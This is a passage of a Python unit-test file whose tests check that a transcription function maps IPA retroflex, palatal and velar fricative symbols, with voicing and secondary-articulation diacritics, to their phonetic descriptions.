def test_ʐʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰʲ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex fricative pulmonic egressive consonant
def test_ʐʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰˠ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex fricative pulmonic egressive consonant
def test_ʐʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐʰˤ")
self.assertEqual(actual, expected)
def test_ʐ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʐ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ʂ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex fricative pulmonic egressive consonant"
actual = describe_transcription("ʂ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless palatal fricative pulmonic egressive consonant
def test_ç_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç")
self.assertEqual(actual, expected)
def test_ç̊_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊")
self.assertEqual(actual, expected)
def test_ç̥_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥")
self.assertEqual(actual, expected)
def test_ʝ̊_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊")
self.assertEqual(actual, expected)
def test_ʝ̥_is_the_representation_of_the_voiceless_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥")
self.assertEqual(actual, expected)
# voiceless labialized palatal fricative pulmonic egressive consonant
def test_çʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʷ")
self.assertEqual(actual, expected)
def test_ç̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊ʷ")
self.assertEqual(actual, expected)
def test_ç̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥ʷ")
self.assertEqual(actual, expected)
def test_ʝ̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʷ")
self.assertEqual(actual, expected)
def test_ʝ̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized palatal fricative pulmonic egressive consonant
def test_çʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʲ")
self.assertEqual(actual, expected)
def test_ç̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊ʲ")
self.assertEqual(actual, expected)
def test_ç̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥ʲ")
self.assertEqual(actual, expected)
def test_ʝ̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʲ")
self.assertEqual(actual, expected)
def test_ʝ̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized palatal fricative pulmonic egressive consonant
def test_çˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çˠ")
self.assertEqual(actual, expected)
def test_ç̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊ˠ")
self.assertEqual(actual, expected)
def test_ç̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥ˠ")
self.assertEqual(actual, expected)
def test_ʝ̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ˠ")
self.assertEqual(actual, expected)
def test_ʝ̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized palatal fricative pulmonic egressive consonant
def test_çˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çˤ")
self.assertEqual(actual, expected)
def test_ç̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̊ˤ")
self.assertEqual(actual, expected)
def test_ç̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̥ˤ")
self.assertEqual(actual, expected)
def test_ʝ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ˤ")
self.assertEqual(actual, expected)
def test_ʝ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated palatal fricative pulmonic egressive consonant
def test_çʰ_is_the_representation_of_the_voiceless_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized palatal fricative pulmonic egressive consonant
def test_çʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰʷ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized palatal fricative pulmonic egressive consonant
def test_çʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰʲ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized palatal fricative pulmonic egressive consonant
def test_çʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰˠ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized palatal fricative pulmonic egressive consonant
def test_çʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("çʰˤ")
self.assertEqual(actual, expected)
def test_ʝ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʝ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced palatal fricative pulmonic egressive consonant
def test_ʝ_is_the_representation_of_the_voiced_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ")
self.assertEqual(actual, expected)
def test_ç̬_is_the_representation_of_the_voiced_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬")
self.assertEqual(actual, expected)
def test_ç̬_is_the_representation_of_the_voiced_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬")
self.assertEqual(actual, expected)
# voiced labialized palatal fricative pulmonic egressive consonant
def test_ʝʷ_is_the_representation_of_the_voiced_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʷ")
self.assertEqual(actual, expected)
def test_ç̬ʷ_is_the_representation_of_the_voiced_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʷ")
self.assertEqual(actual, expected)
def test_ç̬ʷ_is_the_representation_of_the_voiced_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized palatal fricative pulmonic egressive consonant
def test_ʝʲ_is_the_representation_of_the_voiced_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʲ")
self.assertEqual(actual, expected)
def test_ç̬ʲ_is_the_representation_of_the_voiced_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʲ")
self.assertEqual(actual, expected)
def test_ç̬ʲ_is_the_representation_of_the_voiced_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized palatal fricative pulmonic egressive consonant
def test_ʝˠ_is_the_representation_of_the_voiced_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝˠ")
self.assertEqual(actual, expected)
def test_ç̬ˠ_is_the_representation_of_the_voiced_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ˠ")
self.assertEqual(actual, expected)
def test_ç̬ˠ_is_the_representation_of_the_voiced_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized palatal fricative pulmonic egressive consonant
def test_ʝˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝˤ")
self.assertEqual(actual, expected)
def test_ç̬ˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ˤ")
self.assertEqual(actual, expected)
def test_ç̬ˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated palatal fricative pulmonic egressive consonant
def test_ʝʰ_is_the_representation_of_the_voiced_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰ")
self.assertEqual(actual, expected)
def test_ç̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized palatal fricative pulmonic egressive consonant
def test_ʝʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰʷ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ç̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized palatal fricative pulmonic egressive consonant
def test_ʝʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰʲ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ç̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized palatal fricative pulmonic egressive consonant
def test_ʝʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰˠ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ç̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized palatal fricative pulmonic egressive consonant
def test_ʝʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝʰˤ")
self.assertEqual(actual, expected)
def test_ʝ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ʝ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ç̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal fricative pulmonic egressive consonant"
actual = describe_transcription("ç̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless velar fricative pulmonic egressive consonant
def test_x_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("x")
self.assertEqual(actual, expected)
def test_x̊_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊")
self.assertEqual(actual, expected)
def test_x̥_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥")
self.assertEqual(actual, expected)
def test_ɣ̊_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊")
self.assertEqual(actual, expected)
def test_ɣ̥_is_the_representation_of_the_voiceless_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥")
self.assertEqual(actual, expected)
# voiceless labialized velar fricative pulmonic egressive consonant
def test_xʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʷ")
self.assertEqual(actual, expected)
def test_x̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊ʷ")
self.assertEqual(actual, expected)
def test_x̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥ʷ")
self.assertEqual(actual, expected)
def test_ɣ̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʷ")
self.assertEqual(actual, expected)
def test_ɣ̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized velar fricative pulmonic egressive consonant
def test_xʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʲ")
self.assertEqual(actual, expected)
def test_x̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊ʲ")
self.assertEqual(actual, expected)
def test_x̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥ʲ")
self.assertEqual(actual, expected)
def test_ɣ̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʲ")
self.assertEqual(actual, expected)
def test_ɣ̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized velar fricative pulmonic egressive consonant
def test_xˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xˠ")
self.assertEqual(actual, expected)
def test_x̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊ˠ")
self.assertEqual(actual, expected)
def test_x̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥ˠ")
self.assertEqual(actual, expected)
def test_ɣ̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ˠ")
self.assertEqual(actual, expected)
def test_ɣ̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized velar fricative pulmonic egressive consonant
def test_xˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xˤ")
self.assertEqual(actual, expected)
def test_x̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̊ˤ")
self.assertEqual(actual, expected)
def test_x̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̥ˤ")
self.assertEqual(actual, expected)
def test_ɣ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ˤ")
self.assertEqual(actual, expected)
def test_ɣ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated velar fricative pulmonic egressive consonant
def test_xʰ_is_the_representation_of_the_voiceless_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰ_is_the_representation_of_the_voiceless_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰ_is_the_representation_of_the_voiceless_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized velar fricative pulmonic egressive consonant
def test_xʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰʷ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized velar fricative pulmonic egressive consonant
def test_xʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("xʰʲ")
self.assertEqual(actual, expected)
def test_ɣ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰʲ")
self.assertEqual(actual, expected)
